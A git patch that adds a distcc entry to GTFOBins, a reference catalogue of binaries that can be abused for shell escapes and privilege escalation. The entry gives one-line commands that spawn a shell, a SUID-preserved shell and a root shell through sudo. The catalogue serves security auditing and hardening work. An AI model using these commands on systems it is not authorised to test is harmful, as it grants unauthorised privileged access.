From 1f52a21411de9b80a3cdf26113a495f6195c9814 Mon Sep 17 00:00:00 2001 From: Miguel R Date: Sun, 5 Feb 2023 13:41:57 +0100 Subject: [PATCH] add distcc install: apt-get install -y distcc man: https://linux.die.net/man/1/distcc --- _gtfobins/distcc.md | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 _gtfobins/distcc.md diff --git a/_gtfobins/distcc.md b/_gtfobins/distcc.md new file mode 100644 index 0000000..ff6bb28 --- /dev/null +++ b/_gtfobins/distcc.md @@ -0,0 +1,9 @@ +--- +functions: + shell: + - code: distcc /bin/sh + suid: + - code: ./distcc /bin/sh -p + sudo: + - code: sudo distcc /bin/sh +---